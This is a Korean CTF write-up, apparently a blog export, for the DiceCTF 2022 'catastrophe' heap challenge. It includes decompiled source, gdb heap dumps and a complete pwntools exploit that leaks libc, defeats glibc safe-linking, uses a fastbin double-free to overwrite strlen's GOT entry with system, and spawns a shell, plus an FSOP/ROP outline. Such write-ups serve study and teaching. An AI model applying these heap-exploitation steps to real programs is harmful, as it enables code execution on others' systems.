https:\/\/github.com\/dicegang\/hope-2022-challenges\/tree\/master\/pwn\/catastrophe\/bin<\/a><\/p>\n\n\n\n https:\/\/ctftime.org\/writeup\/34812<\/a><\/p>\n\n\n\n Ubuntu 22.04 LTS \/ Ubuntu GLIBC 2.35-0ubuntu3<\/p>\n\n\n\n \ucda9\ubd84\ud788 tcache\uc5d0 \uac00\ub4dd\ucc44\uc6b0\uae30 \uc704\ud574 8\ubc88 \ud560\ub2f9\uc2dc\ud0a4\uace0, \ucc98\uc74c \uae30\uc900 7\ubc88 \ud560\ub2f9 \ud574\uc81c\ud55c\ub2e4.<\/p>\n\n\n\n unsorted bin \ud0c0\uc785\uc774\uc5ec\uc57c fd, bk \uac12\uc744 \ud1b5\ud574 libc \uc8fc\uc18c\ub97c leak\ud560 \uc218 \uc788\uae30\uc5d0, 0x100\uc73c\ub85c malloc \uc2dc\ucf1c\uc92c\ub2e4.<\/p>\n\n\n\n free chunk\uc5d0 \ud574\ub2f9\ub418\ub294 0x5b3fcb477a00 \uccad\ud06c\ub97c \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n\n\n\n glibc 2.32 \ubc84\uc804\ubd80\ud130 safe-linking \ubcf4\ud638\uae30\ubc95\uc774 \uc801\uc6a9\ub418\uc788\uc73c\ub098 \uc544\ub798\uc640 \uac19\uc774 \ubcf5\ud638\ud654\uc2dc\ud0a4\uace0 libc \ubca0\uc774\uc2a4 \uc8fc\uc18c\ub97c \uad6c\ud558\uba74 \ub41c\ub2e4.<\/p>\n\n\n\n 0x10\ud06c\uae30\ub85c malloc\uc744 10\ubc88 \uc218\ud589\ud574\uc900\ub2e4.<\/strong><\/p>\n\n\n\n \uc774\ud6c4 7\ubc88 \ud560\ub2f9\ud574\uc81c<\/strong>\uc2dc\ud0a4\uba74, \uc774\ud6c4 \uac19\uc740 \ud06c\uae30 \uccad\ud06c\ub97c \ud560\ub2f9\ud574\uc81c\ud55c\ub2e4\uba74, \uc774\uc81c fastbin\uc5d0 \ub2f4\uae34\ub2e4.<\/p>\n\n\n\n fastbin dup \/ Double-free \ubc84\uadf8 \ud2b8\ub9ac\uac70\ud568.<\/strong><\/p>\n\n\n\n idx 8\uc758 fd \uac12\uc744 \ubcf5\ud638\ud654\ud568.<\/strong><\/p>\n\n\n\n tcache\ub97c \ube44\uc6b0\uae30 \uc704\ud574 malloc(0x10)\uc744 7\ubc88 \uc218\ud589\ud568.<\/strong><\/p>\n\n\n\n libc base \uc8fc\uc18c\uc758 strlen got \u2190 system \ud568\uc218, AAW \uc218\ud589<\/strong><\/p>\n\n\n\n https:\/\/ctftime.org\/writeup\/34812<\/a><\/p>\n\n\n\n \ub9cc\uc57d libc@got \uc601\uc5ed\uc758 strlen \uc8fc\uc18c\ub97c \ubabb\uc4f0\ub294 \uacbd\uc6b0 FSOP \uae30\ubc95\uc744 \ud1b5\ud574<\/strong> ROP\uc73c\ub85c \uc258\uc744 \ub530\ub294 \ubc29\ubc95\uc774 \uc788\ub294\uac83\uac19\ub2e4.<\/p>\n\n\n\n solve \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uac04\ub2e8\ud558\uac8c \uc0b4\ud3b4\ubcf4\uc790.<\/p>\n\n\n\n \uc694\uc57d:<\/strong><\/p>\n\n\n\n 1. 2. 3. 4. \uc0ac\uc2e4 \ud574\ub2f9 \uc791\uc5c5 \uc548\ud574\ub3c4, \uc258 \ub530\uc9c0\ub294\uac70 \ud655\uc778.<\/strong><\/p>\n\n\n\n 5. idx8, idx7\ub97c free\ud558\uace0, idx8\uc5d0 \uc801\ud78c fd \uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c\ub97c \uad6c\ud55c\ub2e4.<\/p>\n\n\n\n 6. 7. idx2\uc5d0\ub294 0x100\ud06c\uae30\ub9cc\ud07c malloc\ud558\uace0,<\/p>\n\n\n\n idx3\uc5d0\uc11c 0x100\ud06c\uae30\ub9cc\ud07c malloc\ud560\ub54c\uc758 \uc8fc\uc18c\ub294 \uc774\uc81c libc\uc758 IO_2_1_stdout \ud568\uc218\ub97c \uac00\ub9ac\ud0a8\ub2e4.<\/p>\n\n\n\n file structure \uad6c\uc870\uccb4\ub97c \uc870\uc791\ud558\uba74, stack \uc8fc\uc18c\ub97c \ub9ad\ub418\uc5b4 stack base \uc8fc\uc18c\ub97c \uad6c\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n 8. idx5\uc5d0\uc11c 0x130\ud06c\uae30\ub9cc\ud07c \uba54\ubaa8\ub9ac\ub97c \ud560\ub2f9\ud558\uace0 fake chunk\ub97c \uad6c\uc131\ud55c\ub2e4. idx2\uc5d0\uc11c \ub2e4\uc2dc 0x100\ud06c\uae30\ub9cc\ud07c malloc\ud558\uace0,<\/p>\n\n\n\n idx3\uc5d0\uc11c \uc2a4\ud0dd \uc8fc\uc18c\ub97c \ud560\ub2f9\ubc1b\uac8c \ub418\uc5b4 (\uc815\ud655\ud788\ub294 op_malloc\ud568\uc218\uc5d0\uc11c\uc758 rbp) rop chain\uc774 \uc368\uc838 Source https:\/\/github.com\/dicegang\/hope-2022-challenges\/tree\/master\/pwn\/catastrophe\/bin https:\/\/ctftime.org\/writeup\/34812 checksec Docker configure Environment Ubuntu 22.04 LTS \/ Ubuntu GLIBC 2.35-0ubuntu3 Decompiled-src Solution (fastbin_dup \uae30\ubc95\uc744 \ud1b5\ud574 AAW \uc5bb\uae30) 1. unsorted bin\uc744 \uc774\uc6a9\ud558\uc5ec fd\uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c… \ub354 \ubcf4\uae30 »[DiceCTF2022] catastrophe (FSOP, safe-linking)<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[19],"tags":[54,33,61,25],"class_list":["post-3679","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-fastbin_dup","tag-fsop","tag-glibc_2-35","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3679","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3679"}],"version-history":[{"count":3,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3679\/revisions"}],"predecessor-version":[{"id":3682,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3679\/revisions\/3682"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3679"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}checksec<\/h3>\n\n\n\n
seo@seo:~\/study\/DiceCTF2022Hope\/catastrophe$ checksec .\/catastrophe\n[*] '\/home\/seo\/study\/DiceCTF2022Hope\/catastrophe\/catastrophe'\n Arch: amd64-64-little\n RELRO: Full RELRO\n Stack: Canary found\n NX: NX enabled\n PIE: PIE enabled\n SHSTK: Enabled\n IBT: Enabled\n Stripped: No<\/pre>\n\n\n\n
Docker configure<\/h3>\n\n\n\n
sudo docker build . -t catastrophe\nsudo docker run -it --rm --privileged --security-opt seccomp=unconfined --user root -p 1337:1337 -p 22222:22222 -p 12345:1234 catastrophe sh<\/pre>\n\n\n\n
\n
$ nc -lp 1338 > libc.so.6\n\n$ nc -lp 1338 > ld-linux-x86-64.so.2<\/pre>\n\n\n\n
\n
# cat \/srv\/lib\/x86_64-linux-gnu\/libc.so.6 | nc 172.17.0.1 1338\n\n# cat \/srv\/lib\/x86_64-linux-gnu\/ld-linux-x86-64.so.2 | nc 172.17.0.1 1338<\/pre>\n\n\n\n
Environment<\/h3>\n\n\n\n
Decompiled-src<\/h3>\n\n\n\n
\n
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)\n{\n unsigned __int64 number; \/\/ rax\n\n setbuf(stdout, 0);\n setbuf(stdin, 0);\n setbuf(stderr, 0);\n while ( 1 )\n {\n print_menu();\n number = get_number();\n if ( number == 4 )\n {\n puts(\"Bye!\");\n exit(0);\n }\n if ( number <= 4 )\n {\n switch ( number )\n {\n case 3uLL:\n op_view();\n goto LABEL_13;\n case 1uLL:\n op_malloc();\n goto LABEL_13;\n case 2uLL:\n op_free();\n goto LABEL_13;\n }\n }\n puts(\"Invalid choice!\");\nLABEL_13:\n putchar(10);\n }\n}\n\nint print_menu()\n{\n puts(\"--- menu ---\");\n puts(\"1) malloc\");\n puts(\"2) free\");\n puts(\"3) view\");\n puts(\"4) leave\");\n return puts(\"------------\");\n}\n\nunsigned __int64 get_number()\n{\n char s[24]; \/\/ [rsp+0h] [rbp-20h] BYREF\n unsigned __int64 v2; \/\/ [rsp+18h] [rbp-8h]\n\n v2 = __readfsqword(0x28u);\n printf(\"> \");\n fgets(s, 16, stdin);\n return strtoull(s, 0, 10);\n}\n\nint op_view()\n{\n __int64 index; \/\/ [rsp+8h] [rbp-8h]\n\n puts(\"Index?\");\n index = get_index();\n return puts(*((const char **)&chonks + index));\n}\n\nint op_malloc()\n{\n __int64 index; \/\/ [rsp+0h] [rbp-10h]\n unsigned __int64 size; \/\/ [rsp+8h] [rbp-8h]\n\n puts(\"Index?\");\n index = get_index();\n puts(\"Size?\");\n size = get_number();\n if ( !size || size > 0x200 )\n return puts(\"Interesting...\");\n *((_QWORD *)&chonks + index) = malloc(size);\n printf(\"Enter content: \");\n return (unsigned int)fgets(*((char **)&chonks + index), size, stdin);\n}\n\nvoid op_free()\n{\n __int64 index; \/\/ [rsp+8h] [rbp-8h]\n\n puts(\"Index?\");\n index = get_index();\n free(*((void **)&chonks + index));\n}\n\nunsigned __int64 get_index()\n{\n unsigned __int64 number; \/\/ [rsp+8h] [rbp-8h]\n\n while ( 1 )\n {\n number = get_number();\n if ( number <= 9 )\n break;\n puts(\"Invalid!\");\n }\n return number;\n}<\/pre>\n\n\n\nSolution (fastbin_dup \uae30\ubc95\uc744 \ud1b5\ud574 AAW \uc5bb\uae30)<\/h3>\n\n\n\n
1. unsorted bin\uc744 \uc774\uc6a9\ud558\uc5ec fd\uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c \uad6c\ud558\uae30.<\/h3>\n\n\n\n
for i in range(8):\n malloc(i, 0x100, b\"A\"*8)\n\nmalloc(8, 0x100, b\"B\"*8)\n\nfor i in range(7):\n free(i)<\/pre>\n\n\n\n
\n
gdb-peda$ x\/16gx 0x5b3fb20ab060\n0x5b3fb20ab060 <chonks>:\t0x00005b3fcb4772a0\t0x00005b3fcb4773b0\n0x5b3fb20ab070 <chonks+16>:\t0x00005b3fcb4774c0\t0x00005b3fcb4775d0\n0x5b3fb20ab080 <chonks+32>:\t0x00005b3fcb4776e0\t0x00005b3fcb4777f0\n0x5b3fb20ab090 <chonks+48>:\t0x00005b3fcb477900\t0x00005b3fcb477a10\n0x5b3fb20ab0a0 <chonks+64>:\t0x00005b3fcb477b20\t0x0000000000000000\n0x5b3fb20ab0b0:\t0x0000000000000000\t0x0000000000000000\n0x5b3fb20ab0c0:\t0x0000000000000000\t0x0000000000000000\n0x5b3fb20ab0d0:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$ parseheap\naddr prev size status fd bk \n0x5b3fcb477000 0x0 0x290 Used None None\n0x5b3fcb477290 0x0 0x110 Freed 0x5b3fcb477 None\n0x5b3fcb4773a0 0x0 0x110 Freed 0x5b3a78bbc6d7 None\n0x5b3fcb4774b0 0x0 0x110 Freed 0x5b3a78bbc7c7 None\n0x5b3fcb4775c0 0x0 0x110 Freed 0x5b3a78bbc0b7 None\n0x5b3fcb4776d0 0x0 0x110 Freed 0x5b3a78bbc1a7 None\n0x5b3fcb4777e0 0x0 0x110 Freed 0x5b3a78bbc297 None\n0x5b3fcb4778f0 0x0 0x110 Freed 0x5b3a78bbc387 None\n0x5b3fcb477a00 0x0 0x110 Freed 0x750f4801ace0 0x750f4801ace0\n0x5b3fcb477b10 0x110 0x110 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5b3fcb477c20 (size : 0x203e0) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x5b3fcb477a00 (size : 0x110)\n(0x110) tcache_entry[15](7): 0x5b3fcb477900 --> 0x5b3fcb4777f0 --> 0x5b3fcb4776e0 --> 0x5b3fcb4775d0 --> 0x5b3fcb4774c0 --> 0x5b3fcb4773b0 --> 0x5b3fcb4772a0\ngdb-peda$ <\/pre>\n\n\n\n
unsorted bin\uc740 \uc801\uc6a9\ub418\uc9c0 \uc54a\uc544 base \uc8fc\uc18c\ub97c \uc27d\uac8c \uad6c\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\ngdb-peda$ x\/16gx 0x5b3fcb477a00\n0x5b3fcb477a00:\t0x0000000000000000\t0x0000000000000111\n0x5b3fcb477a10:\t0x0000750f4801ace0\t0x0000750f4801ace0\n0x5b3fcb477a20:\t0x0000000000000000\t0x0000000000000000\n0x5b3fcb477a30:\t0x0000000000000000\t0x0000000000000000\n0x5b3fcb477a40:\t0x0000000000000000\t0x0000000000000000\n0x5b3fcb477a50:\t0x0000000000000000\t0x0000000000000000\n0x5b3fcb477a60:\t0x0000000000000000\t0x0000000000000000\n0x5b3fcb477a70:\t0x0000000000000000\t0x0000000000000000\ngdb-peda$ <\/pre>\n\n\n\n
\n
def decrypt(cipher):\n key = 0\n plain = 0\n\n for i in range(1, 6):\n bits = 64-12*i\n if bits < 0:\n bits = 0\n plain = ((cipher ^ key) >> bits) << bits\n key = plain >> 12\n\n return plain\n\n# 1. unsorted bin\uc744 \uc774\uc6a9\ud558\uc5ec fd\uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c \uad6c\ud558\uae30.\nfor i in range(8):\n malloc(i, 0x100, b\"A\"*8)\n\nmalloc(8, 0x100, b\"B\"*8)\n\nfor i in range(8):\n free(i)\n\nleak = view(7)\nlibc_base = rl().split(b'\\n')[0]\nlibc_base = uu64(libc_base) - 0x21ace0\n# libc_base = uu64(libc_base) - 0x219ce0\ninfo(f\"libc_base: {hex(libc_base)}\")\nl.address = libc_base\nfree(8) #clean<\/pre>\n\n\n\n\n
seo@seo:~\/study\/DiceCTF2022Hope\/catastrophe$ python3 solve2.py\n[+] Starting local process '.\/catastrophe.bak': pid 5465\n[*] libc_base: 0x7a0998600000<\/pre>\n\n\n\n
2. fastbin_dup \uae30\ubc95\uc744 \ud1b5\ud574 \ud560\ub2f9\ubc1b\uc73c\ub824\ub294 \uc8fc\uc18c\ub97c \uc784\uc758 \uc870\uc791\ud558\uae30.<\/h3>\n\n\n\n
(0x20) tcache_entry[0](7)<\/code> \ub97c \uc0b4\ud3b4\ubd24\uc744\ub54c tcache\uc5d0 \uac00\ub4dd \ub2f4\uae34\uac78 \ud655\uc778\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n# 2. fastbin_dup \uae30\ubc95\uc744 \ud1b5\ud574 \ud560\ub2f9\ubc1b\uc73c\ub824\ub294 \uc8fc\uc18c\ub97c \uc784\uc758 \uc870\uc791\ud558\uae30.\nfor i in range(10):\n malloc(i, 0x10, b\"A\"*8)\n\nfor i in range(7):\n free(i)<\/pre>\n\n\n\n
\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x5cbb5db7eb40 (size : 0x204c0) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x0\n(0x20) tcache_entry[0](7): 0x5cbb5db7ead0 --> 0x5cbb5db7eab0 --> 0x5cbb5db7ea90 --> 0x5cbb5db7ea70 --> 0x5cbb5db7ea50 --> 0x5cbb5db7ea30 --> 0x5cbb5db7ea10\n(0x110) tcache_entry[15](7): 0x5cbb5db7e900 --> 0x5cbb5db7e7f0 --> 0x5cbb5db7e6e0 --> 0x5cbb5db7e5d0 --> 0x5cbb5db7e4c0 --> 0x5cbb5db7e3b0 --> 0x5cbb5db7e2a0\ngdb-peda$ <\/pre>\n\n\n\n
free(7) # A idx 7 : A linked into fastbin\nfree(8) # B idx 8 : B linked into fastbin\nfree(7) # A idx 7 : A linked into fastbin again<\/pre>\n\n\n\n
\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x56ddf01aaae0 --> 0x56ddf01aab00 --> 0x56ddf01aaae0 (overlap chunk with 0x56ddf01aaae0(freed) )\n...<\/pre>\n\n\n\n
view(8)\nleak = rl().split(b\"\\n\")[0]\nenc_fd = uu64(leak)\ninfo(f\"enc_fd: {hex(enc_fd)}\")\norig_fd = decrypt(enc_fd)\ninfo(f\"orig_fd: {hex(orig_fd)}\")\n\n#enc_fd = (orig_fd) ^ (heap_base >> 12)\nheap_base_rshifted_12 = orig_fd ^ enc_fd\ninfo(f\"heap_base_rshifted_12: {hex(heap_base_rshifted_12)}\")<\/pre>\n\n\n\n\n
[*] enc_fd: 0x58ef8e074094\n[*] orig_fd: 0x58ea00a74ae0\n[*] heap_base_rshifted_12: 0x58ea00a74<\/pre>\n\n\n\n
#empty tcache\nfor i in range(7):\n malloc(i, 0x10, b\"C\"*8)<\/pre>\n\n\n\n
\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x600b54a53ae0 --> 0x600b54a53b00 --> 0x600b54a53ae0 (overlap chunk with 0x600b54a53ae0(freed) )\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x600b54a53b40 (size : 0x204c0) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x0\n(0x20) tcache_entry[0](7): 0x600b54a53ad0 --> 0x600b54a53ab0 --> 0x600b54a53a90 --> 0x600b54a53a70 --> 0x600b54a53a50 --> 0x600b54a53a30 --> 0x600b54a53a10\n(0x110) tcache_entry[15](7): 0x600b54a53900 --> 0x600b54a537f0 --> 0x600b54a536e0 --> 0x600b54a535d0 --> 0x600b54a534c0 --> 0x600b54a533b0 --> 0x600b54a532a0\ngdb-peda$ <\/pre>\n\n\n\n
\n
gdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x600b54a53ae0 --> 0x600b54a53b00 --> 0x600b54a53ae0 (overlap chunk with 0x600b54a53ae0(freed) )\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x600b54a53b40 (size : 0x204c0) \n last_remainder: 0x0 (size : 0x0) \n unsortbin: 0x0\n(0x110) tcache_entry[15](7): 0x600b54a53900 --> 0x600b54a537f0 --> 0x600b54a536e0 --> 0x600b54a535d0 --> 0x600b54a534c0 --> 0x600b54a533b0 --> 0x600b54a532a0<\/pre>\n\n\n\n
\n
where = (l.got.strlen-8) ^ heap_base_rshifted_12\nwhat = l.sym.system;ip()\nmalloc(0, 0x10, p64(where));#ip() #0x5df205c0eaf0\nmalloc(1, 0x10, b\"D\"*8);#ip() #0x5df205c0eb10\nmalloc(2, 0x10, b\"sh\\x00\");#ip() #0x5df205c0eaf0\nmalloc(3, 0x10, b\"\\x00\" * 8 + p64(what)) #0x7ecd3181a090\n\nview(2)<\/pre>\n\n\n\n
solve.py<\/h3>\n\n\n\n
from pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\nimport sys\n\np = process(\".\/catastrophe.bak\")\ne = ELF('.\/catastrophe.bak',checksec=False)\nl = ELF('\/lib\/x86_64-linux-gnu\/libc.so.6', checksec=False)\n# l = ELF('.\/libc.so.6', checksec=False)\n\ns = lambda str: p.send(str)\nsl = lambda str: p.sendline(str)\nsa = lambda delims, str: p.sendafter(delims, str)\nsla = lambda delims, str: p.sendlineafter(delims, str)\nr = lambda numb=4096: p.recv(numb)\nrl = lambda: p.recvline()\nru = lambda delims: p.recvuntil(delims)\nuu32 = lambda data: u32(data.ljust(4, b\"\\x00\"))\nuu64 = lambda data: u64(data.ljust(8, b\"\\x00\"))\nli = lambda str, data: log.success(str + \"========>\" + hex(data))\nip = lambda: input()\npi = lambda: p.interactive()\n\ndef malloc(idx, size, content):\n if(idx > 10):\n info(\"idx is too big\")\n sys.exit(1)\n sla(\"> \", \"1\")\n sla(\"> \", str(idx))\n sla(\"> \", str(size))\n sla(b\"Enter content: \", content)\n\ndef free(idx):\n if(idx > 10):\n info(\"idx is too big\")\n sys.exit(1)\n sla(\"> \", \"2\")\n sla(\"> \", str(idx))\n\ndef view(idx):\n if(idx > 10):\n info(\"idx is too big\")\n sys.exit(1)\n sla(\"> \", \"3\")\n sla(\"> \", str(idx))\n\ndef decrypt(cipher):\n key = 0\n plain = 0\n\n for i in range(1, 6):\n bits = 64-12*i\n if bits < 0:\n bits = 0\n plain = ((cipher ^ key) >> bits) << bits\n key = plain >> 12\n\n return plain\n\n# 1. unsorted bin\uc744 \uc774\uc6a9\ud558\uc5ec fd\uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c \uad6c\ud558\uae30.\nfor i in range(8):\n malloc(i, 0x100, b\"A\"*8)\n\nmalloc(8, 0x100, b\"B\"*8)\n\nfor i in range(8):\n free(i)\n\nleak = view(7)\nlibc_base = rl().split(b'\\n')[0]\nlibc_base = uu64(libc_base) - 0x21ace0\n# libc_base = uu64(libc_base) - 0x219ce0\ninfo(f\"libc_base: {hex(libc_base)}\")\nl.address = libc_base\nfree(8) #clean\n\n\n# 2. fastbin_dup \uae30\ubc95\uc744 \ud1b5\ud574 \ud560\ub2f9\ubc1b\uc73c\ub824\ub294 \uc8fc\uc18c\ub97c \uc784\uc758 \uc870\uc791\ud558\uae30.\nfor i in range(10):\n malloc(i, 0x10, b\"A\"*8)\n\nfor i in range(7):\n free(i)\n\nfree(7) # A idx 7 : A linked into fastbin\nfree(8) # B idx 8 : B linked into fastbin\nfree(7) # A idx 7 : A linked into fastbin again\n\nview(8)\nleak = rl().split(b\"\\n\")[0]\nenc_fd = uu64(leak)\ninfo(f\"enc_fd: {hex(enc_fd)}\")\norig_fd = decrypt(enc_fd)\ninfo(f\"orig_fd: {hex(orig_fd)}\")\n\n#enc_fd = (orig_fd) ^ (heap_base >> 12)\nheap_base_rshifted_12 = orig_fd ^ enc_fd\ninfo(f\"heap_base_rshifted_12: {hex(heap_base_rshifted_12)}\")\n\n\n#empty tcache\nfor i in range(7):\n malloc(i, 0x10, b\"C\"*8)\n\n#enc_fd = (orig_fd) ^ (heap_base >> 12)\nwhere = (l.got.strlen-8) ^ heap_base_rshifted_12\nwhat = l.sym.system\nmalloc(0, 0x10, p64(where));#ip() #0x5df205c0eaf0\nmalloc(1, 0x10, b\"D\"*8);#ip() #0x5df205c0eb10\nmalloc(2, 0x10, b\"sh\\x00\");#ip() #0x5df205c0eaf0\nmalloc(3, 0x10, b\"\\x00\" * 8 + p64(what)) #0x7ecd3181a090\n\nview(2)\n\npi()<\/pre>\n\n\n\nResult<\/h3>\n\n\n\n
...\nx00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00> $ i id id\nuid=1000(seo) gid=1000(seo) groups=1000(seo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)\n$ whoami\nseo\n$ \n[*] Interrupted\n[*] Stopped process '.\/catastrophe.bak' (pid 6521)\nseo@seo:~\/study\/DiceCTF2022Hope\/catastrophe$ \n<\/pre>\n\n\n\n
BONUS<\/h3>\n\n\n\n
# 1. Defeat safe-linking\n# malloc(0x100) 7\ubc88 \ud560\ub2f9\uc2dc\ud0a4\uace0 0\ubc88 \uc778\ub371\uc2a4\ub97c free\uc2dc\ucf1c fd\uac12\uc744 \uc54c\uc544\ub0b8\ub2e4\uc74c, \ub2e4\uc2dc 0\ubc88\uca30 \uc778\ub371\uc2a4 \ud560\ub2f9.\n\n# 2. \n# 7,8 \uc778\ub371\uc2a4\uc5d0 malloc(0x100)\uc744 \ub354 \ud558\uc9c0\ub9cc, 9\ubc88 \uc778\ub371\uc2a4\ubd80\ud130\ub294 malloc(0x10)\uc73c\ub85c \"\/bin\/sh\" \uc800\uc7a5.\n\n# 3. \n# 0~6\ubc88\uc9f8 \uc778\ub371\uc2a4\ub97c free \uc2dc\ud0a4\uace0\n\n# 4.\n# fastbin_dup \ud2b8\ub9ac\uac70? free(8)-free(7)-malloc(0x100, dummy)-free(8)\n# free(7) \uc774\ud6c4, view(8)\uc73c\ub85c fd\uac12\uc744 \ud1b5\ud574 libc base \uc8fc\uc18c \ud68d\ub4dd\n\n# 5.\n# \uc774\ud6c4 malloc(1, 0x130)\uc5d0 fake chunk \uad6c\uc131.\n# malloc(2, 0x100, dummy) \uad6c\uc131.\n# malloc(3, 0x100, fsop chain) \uad6c\uc131\uc2dc\ucf1c \uc2a4\ud0dd\uc8fc\uc18c \ub204\ucd9c.\n\n# 6.\n# free(1) - free(2)\uc774\ud6c4, malloc(5, 0x130, fake chunk) \uad6c\uc131.\n# malloc(2, 0x100, dummy) - malloc(3, 0x100, stack + rop chain) \uad6c\uc131.<\/pre>\n\n\n\n
\uc6b0\uc120\uc740 safe-linking \ubcf4\ud638\uae30\ubc95\uc744 \uac04\ud30c\ud558\uae30 \uc704\ud55c\uac83\uc73c\ub85c \ubcf4\uc778\ub2e4.
free\ub41c idx0\uc5d0\ub294 fd\uac00 \ub0a8\ub294\ub370, \uc774\ub97c \ud1b5\ud574 heap base \uc8fc\uc18c\ub97c \ud68d\ub4dd\ud55c\ub2e4.<\/p>\n\n\n\n...\nfor i in range(7):\n malloc(i, 0x100, b\"\")\nfree(0)\n\nview(0)\n\nheap = ((u64(p.recvline()[:-1].ljust(8, b\"\\x00\")) << 12))\ninfo(f\"heap @ {hex(heap)}\")\n# then we defeated safe linking lol<\/pre>\n\n\n\n\n
gdb-peda$ x\/16gx &chonks\n0x594f48907060 <chonks>:\t0x0000594f4ff2c2a0\t0x0000594f4ff2c3b0\n0x594f48907070 <chonks+16>:\t0x0000594f4ff2c4c0\t0x0000594f4ff2c5d0\n0x594f48907080 <chonks+32>:\t0x0000594f4ff2c6e0\t0x0000594f4ff2c7f0\n0x594f48907090 <chonks+48>:\t0x0000594f4ff2c900\t0x0000000000000000\n0x594f489070a0 <chonks+64>:\t0x0000000000000000\t0x0000000000000000\n0x594f489070b0:\t0x0000000000000000\t0x0000000000000000\n0x594f489070c0:\t0x0000000000000000\t0x0000000000000000\n0x594f489070d0:\t0x0000000000000000\t0x0000000000000000\n\ngdb-peda$ x\/8gx 0x0000594f4ff2c2a0\n0x594f4ff2c2a0:\t0x0000000594f4ff2c\t0xd727fc9de02a60ea\n0x594f4ff2c2b0:\t0x0000000000000000\t0x0000000000000000\n0x594f4ff2c2c0:\t0x0000000000000000\t0x0000000000000000\n0x594f4ff2c2d0:\t0x0000000000000000\t0x0000000000000000\n\ngdb-peda$ heapbase\nheapbase : 0x594f4ff2c000\n\ngdb-peda$ p\/x 0x0000000594f4ff2c<<12\n$2 = 0x594f4ff2c000<\/pre>\n\n\n\n
free\uc2dc\ucf30\ub358\uac78\ub85c \ub2e4\uc2dc \uac19\uc740 0x100 \ud06c\uae30\ub85c malloc\ud558\uace0 (malloc(0, 0x100, b\"YY\")<\/code><\/strong>),
\ucd94\ud6c4 fastbin_dup\uc744 \ud2b8\ub9ac\uac70\uc2dc\ud0a4\uae30 \uc704\ud574 3\ubc88\ub354 0x100\ud06c\uae30\ub9cc\ud07c malloc \uc2dc\ud0a8\ub2e4.
